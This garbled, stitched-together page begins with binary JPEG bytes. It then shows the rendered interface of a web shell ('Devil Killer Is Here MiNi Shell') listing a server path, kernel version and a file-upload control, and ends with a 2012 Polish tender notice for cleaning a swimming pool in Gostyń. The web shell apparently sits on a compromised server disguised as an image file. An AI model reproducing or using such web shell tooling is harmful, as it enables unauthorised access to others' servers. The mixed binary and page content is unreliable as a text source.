JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/481622-N-2012.html

<p class="kh_header"><b>Gostyń: Sprzątanie pomieszczeń i utrzymanie czystości w obiekcie krytej pływalni 
przy Ośrodku Sportu i Rekreacji w Gostyniu</b><br>
<b>Numer ogłoszenia: 481622 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji w Gostyniu - jednostka organizacyjna gminy Gostyń , ul. Starogostyńska 9a, 63-800 Gostyń, woj. wielkopolskie, tel. 65 575 89 00, faks 65 572 00 54.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń i utrzymanie czystości w obiekcie krytej pływalni 
przy Ośrodku Sportu i Rekreacji w Gostyniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzątanie pomieszczeń i utrzymanie czystości w obiekcie krytej pływalni 
przy Ośrodku Sportu i Rekreacji w Gostyniu 
CPV: 90910000-9 Usługi sprzątania 


Przedmiotem zamówienia jest kompleksowe sprzątanie pomieszczeń krytej pływalni przy Ośrodku Sportu i Rekreacji w Gostyniu o łącznej powierzchni : ok. 1 756 m2 w tym  hala basenowa z zapleczem 1 612 m2 oraz  pomieszczenia socjalne wraz zapleczem technicznym 144 m2.

Zamawiający umożliwi dokonanie oględzin pomieszczeń pływalni w dniach od poniedziałku do piątku w godz. od 9.00 do 14.00 (po wcześniejszym uzgodnieniu telefonicznym).

W zakres zamówienia wchodzi usługa sprzątania i utrzymania czystości na terenie krytej pływalni w Gostyniu o powierzchni ok. 1797 m2. Przedmiot zamówienia obejmuje w szczególności: całodzienne czyszczenie i konserwację ciągów komunikacyjnych; wycieranie kurzu z parapetów, dezynfekcję ścian, podłóg i przybasenia; sprzątanie w toaletach, uzupełnianie na bieżąco w papier toaletowy, ręczniki papierowe oraz mydło w płynie. 

Szczegółowy opis przedmiotu zamówienia:

Obiekt krytej pływalni ze względu na specyfikę usług sprzątania został podzielony na następujące strefy:

1.	Hala basenowa-strefa 0
2.	Fitness - strefa 1
3.	Natryski, toalety - strefa 2
4.	Przebieralnie - strefa 3
5.	Wejścia, hall główny, recepcja, klatka schodowa, winda - strefa 4
6.	Kasa, pomieszczenia biurowe, pomieszczenia techniczne, siłowania  - strefa 5

System sprzątania

STREFA 0 - środki chemiczne : brodziki, obrzeża basenu, kratki przelewowe, korytka ściekowe (maszyna ciśnieniowa-dezynfekcja)
Mycie i dezynfekcja rynienek przelewowych i kratek zabezpieczających przeprowadzana jest 3 razy w tygodniu (poniedziałek, środa, piątek) na III zmianie.
STREFA 1 - środki kwaśne, system szmatek, zestaw dwu wiaderkowy, mycie i dezynfekcja powierzchni pionowych i poziomych 
STREFA 2 - środki kwaśne, system szmatek, zestaw dwu wiaderkowy, wytwornica piany do mycia i dezynfekcji powierzchni pionowych
STREFA 3 - system szmatek, zestaw dwu wiaderkowy, środki dezynfekujące, mycie ręczne szafek wewnątrz i zewnątrz
STREFA 4 - zestaw dwu wiaderkowy, system szmatek, maszyna czyszcząca, 
STREFA 5 - środki czystości, zestaw dwu wiaderkowy , system szmatek, odkurzacz.

UWAGA: każda strefa sprzątana jest za pomocą osobnych mopów

Sprzątanie we wszystkich strefach oprócz powierzchni wody odbywa się na bieżąco przez cały czas otwarcia obiektu a generalne po zamknięciu (w godzinach nocnych -III zmiana).

Wymagania Zamawiającego dotyczące czasu i zakresu świadczenia usługi: 
Czas pracy:
a.	I zmiana: 6.00-14.00 
b.	II zmiana: 14.00-22.00
c.	III zmiana: 22.00-6.00


UWAGA:  hala basenowa, plaża, brodzik dla dzieci, schody zjeżdżalni - sprzątanie i dezynfekcja tylko na III zmianie.

Szczegółowy opis wykonywanych czynności w poszczególnych strefach

STREFA 0
Mycie i dezynfekcja posadzki otoczenia niecki jest wykonywana codziennie na III zmianie bezpośrednio po wyjściu ostatniego użytkownika z niecki basenu.
Mycie posadzki otoczenia niecki basenu wykonuje się za pomocą środków myjąco-dezynfekujących.

Mycie i dezynfekcję rynienek przelewowych i kratek zabezpieczających przeprowadza się trzy razy w tygodniu (poniedziałek, środa, piątek) na III zmianie. Pierwszą czynnością jest zdjęcie kratek zabezpieczających i ułożenie ich obok rynienek, następnie szorowanie lub czyszczenie maszyną wysokociśnieniową przy pomocy środków dezynfekująco - myjących (typu CALCID KOMBI) w odpowiednim stężeniu. Po wyczyszczeniu rynienki należy spłukać wodą.

Czynność mycia i dezynfekcji wanny whirpool oraz basenu zjeżdżalni jest wykonywana codziennie na III zmianie po opuszczeniu pomieszczeń basenu przez ostatniego użytkownika.
Należy bardzo dokładnie umyć i zdezynfekować ściany i rynienki przelewowe wanny whirpool i basenu zjeżdżalni za pomocą środka myjąco-dezynfekującego lub roztworu podchlorynu sodu.

WYMIENIONE CZYNNOŚCI NALEŻY WYKONYWAĆ BARDZO OSTROŻNIE, ABY NIE SPOWODOWAĆ DOSTANIA SIĘ ŚRODKÓW MYJĄCYCH DO WODY ZNAJDUJĄCEJ SIĘ W NIECKACH.

Codziennie przeprowadza się również mycie i dezynfekcję widowni oraz wszystkich fotelików plastikowych znajdujących się na hali basenowej oraz drzwi i powierzchni oszklonych.

STREFA 1
Czynność mycia i dezynfekcji solariów oraz saun jest wykonywana codziennie wieczorem po opuszczeniu pomieszczeń basenu przez ostatniego użytkownika. Należy bardzo dokładnie umyć i dokonać dezynfekcji powierzchni solariów i sauny. Roztwór np. San Clear Med. Pozostałe powierzchnie (przebieralnie, natryski, toalety, pokój wypoczynku i klatkę schodową z części basenowej) należy umyć i zdezynfekować w sposób opisany w strefie 2 i 3.

STREFA 2
Czynność mycia i dezynfekcji pomieszczeń natrysków i toalet jest wykonywana codziennie wieczorem po opuszczeniu pomieszczeń basenu przez ostatniego użytkownika.
Należy dokładnie umyć i dokonać dezynfekcji wszystkich urządzeń, armatury oraz powierzchni pionowych. Dezynfekcję należy wykonać środkiem dezynfekująco - myjącym. Należy dokładnie umyć i przeprowadzić dezynfekcję podłogi wymienionych pomieszczeń. W trakcie użytkowania strefy 2 należy wykonywać na bieżąco mycie i zbieranie wody oraz zanieczyszczeń z powyższych pomieszczeń oraz mycie luster i innych elementów.


STREFA 3 
Czynność mycia i dezynfekcji pomieszczeń przebieralni jest wykonywana codziennie wieczorem po opuszczeniu pomieszczeń basenu przez ostatniego użytkownika.
Należy otworzyć wszystkie szafki i dokładnie umyć i dokonać dezynfekcji szafek, siedzisk oraz ścian przebieralni. Dezynfekcji należy wykonać płynem dezynfekująco - myjącym. Należy bardzo dokładnie umyć i przeprowadzić dezynfekcję podłogi w przebieralniach. W trakcie użytkowania przebieralni w czasie I i II zmiany należy wykonywać bieżące mycie i zbieranie wody oraz zanieczyszczeń z pomieszczeń przebieralni oraz mycie luster i innych elementów (suszarki itp.).


STREFA 4
Czynność mycia i dezynfekcji podłogi holu, korytarzy, windy, klatek schodowych i wiatrołapów przeprowadzana jest codziennie i polega na myciu i dezynfekcji podłóg przy pomocy środka myjąco - dezynfekującego i mopa lub przy pomocy szorowarki w przypadku hallu wejściowego. Gruntowne sprzątanie tej strefy odbywa się na III zmianie. Na I i II zmianie wykonuje się czynności sprzątania na bieżąco aby przez cały czas otwarcia krytej pływalni było czysto.


STREFA 5
W ramach wykonywania czynności sprzątania pomieszczeń biurowych należy: odkurzyć wykładzinę podłogową, utrzymać w czystości meble biurowe oraz  drzwi. W ramach tych czynności należy również opróżnić kosze na śmieci. 
Powierzchnię podłogi w siłowni, pomieszczeniu technicznym oraz kasie należy umyć i zdezynfekować środkiem dezynfekująco - myjącym.
Gruntowne sprzątanie tej strefy odbywa się na III zmianie. Na I i II zmianie wykonuje się czynności sprzątania na bieżąco aby przez cały czas otwarcia krytej pływalni było czysto.


We wszystkich strefach nie wolno dopuszczać do powstawania zastoin wodnych.
Wyszczególnienie prac związanych z utrzymaniem czystości na krytej pływalni w Gostyniu:
PIWNICA:
Mycie podłogi w hallu i ciągach komunikacyjnych; sprzątanie windy; mycie szatni(dezynfekcja szafek); mycie ścian w szatni; wycieranie kurzu z góry szafek(dezynfekcja); mycie drzwi przebieralni(dezynfekcja); mycie toalet, zlewów, dozowników, klamek, luster (dezynfekcja); mycie kloszy, włączników światła; mycie 
i dezynfekcja natrysków; ścieranie kurzu z grzejników, parapetów, gaśnic; uzupełnianie środków higieny; mycie wejścia-szyby, ramy, podłoga, schody; czyszczenie wycieraczek 
i maty wejściowej; opróżnianie pojemników na śmieci; mycie i dezynfekcja podłogi i ścian w pokoju odpoczynku; mycie i dezynfekcja pomieszczeń solarium; mycie i dezynfekcja sauny fińskiej i parowej.

PARTER:
Mycie podłogi w hallu i ciągach komunikacyjnych; ścieranie kurzu z grzejników, parapetów, gaśnic; uzupełnianie środków higieny; mycie wejścia-szyby, ramy, podłoga, schody; czyszczenie wycieraczek i maty wejściowej; opróżnianie pojemników na śmieci; mycie 
i dezynfekcja ławek w holu; mycie i dezynfekcja drzwi i ram wszystkich pomieszczeń; mycie i dezynfekcja łazienek i toalet na holu; mycie kloszy; czyszczenie podłogi i schodów; czyszczenie kaloryferów; mycie ścian w szatniach; mycie i dezynfekcja przebieralni; czyszczenie i dezynfekcja toalet, zlewów, pojemników na środki higieny; dezynfekcja ławek, czyszczenie luster; mycie i dezynfekcja podłogi w szatniach; czyszczenie i dezynfekcja brodzików; mycie i dezynfekcja natrysków.

Wszystkie elementy ze stali nierdzewnej myte codziennie na III zmianie odpowiednimi środkami.
Ponadto mycie okien hali basenu cztery razy w roku - raz na kwartał.

Inne czynności związane ze świadczeniem usług objętych przedmiotem zamówienia:
1.Zamykanie drzwi i okien.
2.Gaszenie świateł po zakończonej pracy.
3.Wyłączanie z prądu podgrzewaczy wody, grzejników, czajników, odbiorników radiowych.
4.Informowanie o niebezpieczeństwach i zagrożeniach w budynku.
5.Zakup środków higieny - papier toaletowy, ręczniki papierowe, mydło w płynie do urządzeń znajdujących się w sanitariatach (wykaz urządzeń podany jest w załączniku  nr 5 do SIWZ).
6.Pracownicy upoważnieni przez Zamawiającego mają prawo prowadzić w każdym czasie kontrolę jakości świadczonych usług przez Wykonawcę, będących przedmiotem zamówienia. Wykonawca zobowiązuje się do wykonywania prac objętych przedmiotem zamówienia  sprzętem, będącym w jego dyspozycji i własnymi środkami czystości, odpowiednimi do charakteru obiektu, stosując w swojej pracy odpowiednie urządzenia i technologie. Środki stosowane do wykonywania prac objętych niniejszym zamówieniem winny posiadać stosowne atesty i karty charakterystyki. Niedopuszczalne jest modyfikowanie stosowanych środków czyszczących niezgodne z instrukcją ich użytkowania np. przez ich rozcieńczenie. Wykonawca ma obowiązek przechowywać w miejscu realizacji zamówienia i udostępniać na każde żądanie Zamawiającego aktualne atesty i karty charakterystyki substancji i preparatów chemicznych stosowanych do wykonania prac objętych niniejszym zamówieniem. Wykaz środków w momencie składania oferty
7.Reklamacje co do jakości wykonywanych przez Wykonawcę prac będą zgłaszane najpóźniej w następnym dniu roboczym po wykonaniu pracy, w przeciwnym przypadku wykonane prace uznaje się za wykonane należycie i przyjęte przez Zamawiającego. W przypadku stwierdzenia wad i uchybień dotyczących wykonanej usługi i konieczności wykonania poprawek, wykonawca zobowiązuje się wykonać bez dodatkowego wynagrodzenia w terminie wyznaczonym przez Zamawiającego. W przypadku czynności niezbędnych dla prawidłowego funkcjonowania pływalni, Wykonawca zobowiązuje się usunąć stwierdzone wady i uchybienia w ciągu 30 minut od chwili zgłoszenia.
8.Przelewy basenowe i kratki przelewowe należy myć codziennie przy użyciu właściwych środków czyszczących. Czyszczenie i pielęgnacja szatni i przybasenia ma zasadniczy wpływ na stan higieniczny pływalni. Pomieszczenia szatni, co najmniej kilka razy dziennie muszą być myte wodą z dodatkiem środków myjąco-dezynfekujących. Używać należy środków posiadających odpowiednie atesty. Niedopuszczalne jest pojawianie się zastoin wodnych, które muszą być na bieżąco usuwane. Po dniu eksploatacji powierzchnie przybasenia muszą być umyte wodą z dodatkiem środków myjąco-dezynfekujących, takich jak w przypadku niecki basenowej oraz wytarte.
9.Zalecenia dotyczące personelu: Personel sprzątający krytą pływalnię ze względu na specyfikę obiektu musi być przeszkolony w zakresie BHP na tego typu obiektach. Każdy z pracowników zobowiązany jest do posiadania aktualnej pracowniczej książeczki zdrowia dla celów sanitarno-epidemiologicznych. Ilość osób sprzątających powinna być dostosowana do ilości zadań, które  muszą być wykonane - określenie tej ilości należy do wykonawcy, a także powinien być wyposażony w odzież ochronną z widoczną nazwą (logo) firmy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia oraz sporządzi wykaz wykonanych w ciągu ostatnich 3 lat (licząc od daty wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej jedną (trwającą co najmniej 12 miesięcy w ramach jednej umowy) usługę sprzątania obiektów krytego basenu wraz z infrastruktura towarzyszącą bądź obiektach branży spożywczej  lub obiektach ochrony zdrowia, o łącznej pow. przekraczającej 1500 m2, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie - wg wzoru stanowiącego załącznik nr 4 do SIWZ.  Ponadto wykonawca musi posiadać wdrożony system zarządzania jakością ISO 9001:2008 zgodny z normą 11/2008 lub inny spełniający powyższe wymagania w zakresie usług utrzymania czystości obiektów,  oraz Certyfikat Gwarant Czystości i Higieny na świadczenie usług utrzymania czystości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia oraz sporządzi wykaz  sprzętu do wykonania zamówienia w tym m.in. wykaże, że dysponuje urządzeniami mechanicznymi, które będą wykorzystane do utrzymania czystości w obiektach basenu - wg wzoru stanowiącego załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia oraz wykaże posiadanie środków finansowych lub zdolności kredytowej na poziomie nie mniejszym niż 100% podanej miesięcznej ceny ryczałtowej (brutto)   oraz posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności oraz na potwierdzenie spełniania tego warunku dołączy do oferty stosowne dokumenty tj. informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  oraz polisę, a w przypadku jej braku inny dokument, z którego wynikać będzie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż  200.000,00 zł, słownie: dwieście tysięcy złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-certyfikat ISO 9001:2008 zgodny z normą 11/2008 lub inny spełniający powyższe wymagania w zakresie usług utrzymania czystości obiektów;
-certyfikat Gwarant Czystości i Higieny na świadczenie usług utrzymania czystości.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zobowiązany jest również złożyć następujące dokumenty niezbędne do przeprowadzenia postępowania:
1)ofertę wykonawcy - wg wzoru stanowiącego załącznik nr 1 do SIWZ;
2)pełnomocnictwo do reprezentowania wykonawcy, jeśli nie wynika ono z innych przedstawionych dokumentów. Uwaga! Do oferty wykonawca dołącza oryginał pełnomocnictwa lub kopię pełnomocnictwa poświadczoną za zgodność z oryginałem przez notariusza;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
